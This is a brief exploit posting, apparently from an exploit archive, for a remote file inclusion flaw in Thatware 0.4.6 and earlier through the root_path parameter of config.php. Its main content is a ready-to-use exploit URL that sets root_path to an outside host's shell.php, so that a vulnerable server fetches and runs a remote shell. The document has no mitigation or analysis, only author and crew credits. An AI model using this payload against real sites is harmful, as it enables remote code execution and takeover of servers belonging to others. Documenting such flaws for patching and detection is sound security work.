id: 677
date: 08/09/2006
title: Thatware <= 0.4.6 (root_path) Remote File Include Vulnerability
author: Drago84
cves: 

===============================================================
Thatware <= 0.4.6 (root_path) Remote File Include Vulnerability
===============================================================


Thatware  0.4.6 (root_path) Remote File Inclusion

CreW: ToXiC

Bug Found by Drago84


Page Affect
config.php

ExP:
http://www.sito.com/dir_thatware/config.php?root_path=http://www.evalsite.com/shell.php'



#  0day.today [2023-03-24]  #